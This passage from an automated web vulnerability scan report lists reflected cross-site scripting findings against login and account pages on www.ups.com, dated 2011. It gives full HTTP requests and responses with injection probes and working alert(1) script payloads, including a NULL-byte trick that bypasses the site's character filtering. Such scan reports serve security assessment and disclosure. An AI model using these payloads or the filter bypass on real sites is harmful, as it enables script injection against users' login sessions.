Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am129ef%0a3d98201dc8b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am129ef
3d98201dc8b/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am129ef

...[SNIP]...

1.398. https://www.ups.com/account/am/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31909'%3bb572ec76daa was submitted in the REST URL parameter 2. This input was echoed as 31909';b572ec76daa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am31909'%3bb572ec76daa/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
c76daa/start';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am31909';b572ec76daa/start';
actionUrl = "/one-to-one/login?ID=100&
...[SNIP]...

1.399. https://www.ups.com/account/am/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e95b6"%20a%3db%2029ba2d4500a was submitted in the REST URL parameter 2. This input was echoed as e95b6" a=b 29ba2d4500a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/ame95b6"%20a%3db%2029ba2d4500a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/ame95b6" a=b 29ba2d4500a/start">
...[SNIP]...

1.400. https://www.ups.com/account/am/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ab7"%20a%3db%2059b95f1602b was submitted in the REST URL parameter 3. This input was echoed as 52ab7" a=b 59b95f1602b in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start52ab7"%20a%3db%2059b95f1602b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/am/start52ab7" a=b 59b95f1602b">
...[SNIP]...

1.401. https://www.ups.com/account/am/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload bdcfa%0ae0b29bf97aa was submitted in the REST URL parameter 3. This input was echoed as bdcfa
e0b29bf97aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/startbdcfa%0ae0b29bf97aa HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44390

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa
e0b29bf97aa';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/startbdcfa

...[SNIP]...

1.402. https://www.ups.com/account/am/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ad'%3b70dba7c9613 was submitted in the REST URL parameter 3. This input was echoed as 832ad';70dba7c9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start832ad'%3b70dba7c9613 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
7c9613';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/am/start832ad';70dba7c9613';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.403. https://www.ups.com/account/am/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00e96d0</script><script>alert(1)</script>eeee4ba8d58 was submitted in the loc parameter. This input was echoed as e96d0</script><script>alert(1)</script>eeee4ba8d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%00e96d0</script><script>alert(1)</script>eeee4ba8d58&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script><script>alert(1)</script>eeee4ba8d58';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_e96d0</script>
...[SNIP]...

1.404. https://www.ups.com/account/am/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %004ec10'-alert(1)-'cf7523a708f was submitted in the loc parameter. This input was echoed as 4ec10'-alert(1)-'cf7523a708f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%004ec10'-alert(1)-'cf7523a708f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_4ec10'-alert(1)-'cf7523a708f';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.405. https://www.ups.com/account/am/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/am/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0056fb2"><script>alert(1)</script>5e2077907d2 was submitted in the loc parameter. This input was echoed as 56fb2"><script>alert(1)</script>5e2077907d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/am/start?loc=en_US%0056fb2"><script>alert(1)</script>5e2077907d2&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_56fb2"><script>alert(1)</script>5e2077907d2&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_56fb2%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B5e2077907d2%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.406. https://www.ups.com/account/us/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44722"%20a%3db%20d499cf7b97a was submitted in the REST URL parameter 2. This input was echoed as 44722" a=b d499cf7b97a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us44722"%20a%3db%20d499cf7b97a/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us44722" a=b d499cf7b97a/start?appid=OPENACCT">
...[SNIP]...

1.407. https://www.ups.com/account/us/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 1c510%0a5bec88f7632 was submitted in the REST URL parameter 2. This input was echoed as 1c510
5bec88f7632 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us1c510%0a5bec88f7632/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us1c510
5bec88f7632/start?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/a
...[SNIP]...

1.408. https://www.ups.com/account/us/start [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57780'%3bbaf8e0aa31b was submitted in the REST URL parameter 2. This input was echoed as 57780';baf8e0aa31b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us57780'%3bbaf8e0aa31b/start HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us57780';baf8e0aa31b/start?appid=OPENACCT';
actionUr
...[SNIP]...

1.409. https://www.ups.com/account/us/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8dd7"%20a%3db%20a3fcf1e4a73 was submitted in the REST URL parameter 3. This input was echoed as a8dd7" a=b a3fcf1e4a73 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/starta8dd7"%20a%3db%20a3fcf1e4a73 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/account/us/starta8dd7" a=b a3fcf1e4a73?appid=OPENACCT">
...[SNIP]...

1.410. https://www.ups.com/account/us/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload b76c7%0a1e4ac2a860 was submitted in the REST URL parameter 3. This input was echoed as b76c7
1e4ac2a860 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/startb76c7%0a1e4ac2a860 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:48 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40718

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/account/us/startb76c7
1e4ac2a860?appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account
...[SNIP]...

1.411. https://www.ups.com/account/us/start [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ead4'%3be1cc69c801d was submitted in the REST URL parameter 3. This input was echoed as 2ead4';e1cc69c801d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start2ead4'%3be1cc69c801d HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
ENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/account/us/start2ead4';e1cc69c801d?appid=OPENACCT';
actionUrl = "/
...[SNIP]...

1.412. https://www.ups.com/account/us/start [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/account/us/start

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b6c8d"><script>alert(1)</script>62dcb8e5408 was submitted in the loc parameter. This input was echoed as b6c8d"><script>alert(1)</script>62dcb8e5408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%00b6c8d"><script>alert(1)</script>62dcb8e5408&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

